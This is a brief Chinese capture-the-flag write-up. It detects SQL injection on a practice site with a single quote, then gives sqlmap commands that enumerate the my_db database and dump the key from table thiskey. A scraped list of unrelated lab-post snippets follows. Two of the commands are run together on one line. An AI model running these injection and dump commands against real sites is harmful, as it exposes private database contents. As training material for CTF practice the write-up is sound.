这个看起来有点简单!

手工检测是否存在sql注入(经典id=1'加入单引号提交,结果:如果出现错误提示,则该网站可能就存在注入漏洞)
使用sqlmap爆出当前数据库my_db 发现可能藏有key值的thiskey表 进一步爆出字段k0y并得到key值。
查看手册sql map 
python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dumppython sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db --tables
python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey --columns --hex

这个看起来有点简单!--实验吧相关推荐

  1. 这个看起来有点简单!-实验吧

    这道题一开始点进去让人感觉有点蒙圈,不知道要考什么,后来才发现只是道简单的sql注入.........这里写两种做法. sqlmap去跑 先去看一下有什么数据库 sqlmap -u "htt ...

  2. sFlow-rt 3.0流量监控工具安装部署及简单实验

    首先我敢说,现在网上没有谁的文章比我这篇实验记录更加全面.在做这个实验的过程中遇到了许多问题已经解决了,看了许多博客写的内容要不就是工具太落伍了,要不就是条理不清晰,要不就是省略了重要步骤,初学者看了 ...

  3. HCL实验-使用ACL进行SSH服务器的登录源限制的简单实验(NAT+SSH+ACL)

    HCL实验-使用ACL进行SSH服务器的登录源限制的简单实验(NAT+SSH+ACL) 文章目录 HCL实验-使用ACL进行SSH服务器的登录源限制的简单实验(NAT+SSH+ACL) 一.实验描述 ...

  4. Cisco IOS上Segment Routing TE的简单实验

    最近看了些Segment Routing的一些资料,官网找到的实验都是基于IOS-XR系统的,于是自己查看配置手册试着做了个简单实验测试下效果. 拓扑如下: R1.R2.R3.R5.R6.R7之间运行 ...

  5. 陈硕《网络编程实战》 02 一个TCP的简单实验

    [稿] 陈硕<网络编程实战> 02 一个TCP的简单实验 站在巨人的肩膀之上. 按照录像整理,部分专有名词不太肯定,版权归陈硕大神. 实验用的是我家里的几台计算机,第一台的主机名叫atom ...

  6. CTF 这个看起来有点简单

    这个看起来有点简单分值:10 来源: 西普学院 难度:易 很明显.过年过节不送礼,送礼就送这个 格式: 解题链接: http://ctf5.shiyanbar.com/8/index.php?id=1 ...

  7. liunx screen使用简单实验

    liunx screen使用 今天因工作需要使用到screen工具,感觉挺有意思,记录一下 GNU Screen是一款由GNU计划开发的用于命令行终端切换的自由软件.用户可以通过该软件同时连接多个本地 ...

  8. eNSP之防火墙简单实验(一)

    eNSP之防火墙简单实验(一) 实验拓扑 图中,FW与ISP连接的网段仅仅是互联的作用,所以用私有地址段,而内部流量经过防火墙的G1/0/2访问外部流量时使用向运营商申请的公有地址段200.8.8.0 ...

  9. php打字竞赛,“键”笔如飞!看珠海一职实验学校打字竞赛谁与争锋!

    原标题:"键"笔如飞!看珠海一职实验学校打字竞赛谁与争锋! 文字录入...... 文字录入是信息时代每个人必备的基本素养,为了提高学生的计算机操作及应用能力,促进信息技术与学科融合 ...

最新文章

  1. Javascript匿名函数
  2. C#中读写INI配置文件
  3. 单例模式可以分为懒汉式和饿汉式:     懒汉式单例模式:在类加载时不初始化。     饿汉式单例模式:在类加载时就完成了初始化,所以类加载比较慢,但获取对象的速度快。
  4. c语言编程将图片上下翻转,C语言实现矩阵翻转(上下翻转、左右翻转)
  5. [go]method的指针声明及非指针声明
  6. Vitalik Buterin:Casper 权益证明与分片技术最新进展
  7. QT下 cannot find -IGL的解决办法
  8. CF618F-Double Knapsack【结论】
  9. mysql自带加密解密字符集问题
  10. JSTL标签库中fmt标签,日期,数字的格式化
  11. IO复用\阻塞IO\非阻塞IO\同步IO\异步IO
  12. html id怎么设置密码,苹果手机怎么设置id账号和密码或重设密码
  13. L3-010. 是否完全二叉搜索树-PAT团体程序设计天梯赛GPLT
  14. WinCE中为基于对话框的程序动态增加菜单
  15. 3.性能测试通过标准
  16. matlab如何按行查找重复值?
  17. 白杨SEO:品牌口碑业务指什么?企业品牌口碑如何推广与预防公关危机?
  18. 高强度间歇训练(HIIT)
  19. SAP中质量检验结果的清单列表及输出功能简单分析
  20. Lazy 呀!!!!!!

热门文章

  1. 什么是DevOps?
  2. 什么是云存储?有什么优势?
  3. java fgc_记一次频繁FGC的简单排查
  4. origin2022浅学习
  5. python正则表达式入门二
  6. 使用CityEngine制作cim2
  7. vue3.0 深度选择器>>> 和 /deep/ 和 ::v-deep 被弃用‘the >>> and /deep/ combinators have been deprecated‘
  8. 编写一个程序判断一个数是否为素数
  9. 基于 vue3.x + vite + element plus,适配手机、平板、pc 的后台开源免费模板库
  10. Docker学习及实践笔记